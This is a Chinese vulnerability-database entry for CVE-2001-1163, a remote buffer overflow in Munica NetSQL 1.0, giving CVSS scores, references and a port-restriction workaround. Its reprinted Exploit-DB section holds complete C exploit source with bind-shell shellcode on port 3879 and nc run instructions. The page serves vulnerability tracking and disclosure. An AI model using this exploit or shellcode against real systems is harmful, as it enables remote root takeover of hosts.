CVE-2001-1163
CVSS10.0
发布时间 :2001-06-16 00:00:00
修订时间 :2008-09-05 16:25:50
NMCOES    

[原文]Buffer overflow in Munica Corporation NetSQL 1.0 allows remote attackers to execute arbitrary code via a long CONNECT argument to port 6500.


[CNNVD]NetSQL远程缓冲区溢出漏洞(CNNVD-200106-066)

        CVE(CAN) ID: CAN-2001-1163
        
        
        
        NetSQL是由Munica公司发布的一个数据库软件,发现其存在缓冲区溢出漏洞。
        
        
        
        通过向NetSQL端口(一般是6500)发送超长的字符串,NetSQL会缓冲区溢出,利用这个
        
        漏洞,远程攻击者可能在目标主机上以root权限执行任意代码。
        
        
        
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1163
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1163
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-066
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2885
(VENDOR_ADVISORY)  BID  2885

- 漏洞信息

NetSQL远程缓冲区溢出漏洞
危急 边界条件错误
2001-06-16 00:00:00 2005-10-20 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-1163
        
        
        
        NetSQL是由Munica公司发布的一个数据库软件,发现其存在缓冲区溢出漏洞。
        
        
        
        通过向NetSQL端口(一般是6500)发送超长的字符串,NetSQL会缓冲区溢出,利用这个
        
        漏洞,远程攻击者可能在目标主机上以root权限执行任意代码。
        
        
        
        

- 公告与补丁

        
        
        临时解决方法:
        
        
        
        限制对6500端口的访问
        
        
        
        厂商补丁:
        
        
        
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
        
        的主页以获取最新版本:
        
        
        http://www.munica.com/webpak/

        
        
        

- 漏洞信息 (20936)

NetSQL 1.0 Remote Buffer Overflow Vulnerability (EDBID:20936)
linux remote
2001-06-15 Verified
0 Sergio Monteiro
N/A [点击下载]
source: http://www.securityfocus.com/bid/2885/info

NetSQL is an implementation of a database and toolset distributed by Munica Corporation. NetSQL is part of 5 piece software package called the Webpak, containing utilities for features such as web boards, membership, and online calendars.

A buffer overflow in the server makes it possible for a remote user to gain remote root access to a system using the affected software. By sending a long string to port 6500, a remote user can create a buffer overflow, allowing code execution.

This makes it possible for a remote user to gain remote root access, resulting in complete compromise of a system using the affected software.

/* PRIVATE EXPLOIT, DONT DISTRO%$##$%$# 
 * Remote exploit for NetSQL server, by Sergio Monteiro a.k.a Papa-tudo 
 * netsqld - An SQL database server with Web interface
 * check http://www.sekurity.com.br .
 *
 * There is an easily exploitable buffer overflow in netsql.
 * This exploit was tested on redhat 6.2. 
 * 
 * Run like: ./netsql | nc host.com 6500 
 * Then connect to port 3879 for the rootshell.
 *
 * Greets: www.sekurity.com.br
 * Author: Papa-tudo - 
 *
 *PRIVATE EXPLOIT, DONT DISTRO%$##$%$#
*/

 
#include <stdio.h>
#include <string.h>

#define RET 0xbffea3d0

char crap[80];
char cmd[1024];

char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

int
main (int argc, char *argv[])

{

char *buf;
int bsize=180, offset = 0, len = 151, i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) len = atoi(argv[3]);

  buf = malloc(bsize);

  memset (buf, '\x90', bsize);
  memset(crap, '\x41', 80);

       for (i = len; i < bsize - 4; i += 4)
      *(long *) &buf[i] = RET + offset;

  memcpy (buf + (len - strlen (shellcode)), shellcode, strlen (shellcode));

  crap[sizeof(crap)] = '\0';
  buf[bsize - 1] = '\0';

  fprintf(stderr, "Return Address = 0x%x\n", RET + offset);
  fprintf(stderr, "Running with offset %d\n", offset);

printf("76 CONNECT %s ON %s USER=\'netsql\' PASSWORD=\'none\'\n", crap, buf);

}

		

- 漏洞信息

10169
NetSQL CONNECT Argument Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2001-06-15 Unknow
2001-06-15 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

NetSQL Remote Buffer Overflow Vulnerability
Boundary Condition Error 2885
Yes No
2001-06-15 12:00:00 2009-07-11 06:56:00
This vulnerability was announced in an exploit sent to the Securityfocus Vulnerability Analysis Team by Papa-tudo <papatudo@jedi.com.br> on June 15, 2001.

- 受影响的程序版本

Munica NetSQL 1.0
- Red Hat Linux 6.2
- Red Hat Linux 6.2
- RedHat Linux 7.1 i386
- RedHat Linux 7.0
- RedHat Linux 7.0
- RedHat Linux 6.2 E i386
- RedHat Linux 6.2 E i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 i386
- RedHat Linux 6.0
- RedHat Linux 6.0

- 漏洞讨论

NetSQL is an implementation of a database and toolset distributed by Munica Corporation. NetSQL is part of 5 piece software package called the Webpak, containing utilities for features such as web boards, membership, and online calendars.

A buffer overflow in the server makes it possible for a remote user to gain remote root access to a system using the affected software. By sending a long string to port 6500, a remote user can create a buffer overflow, allowing code execution.

This makes it possible for a remote user to gain remote root access, resulting in complete compromise of a system using the affected software.

- 漏洞利用

Exploit contributed by Papa-tudo &lt;papatudo@jedi.com.br&gt;.

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站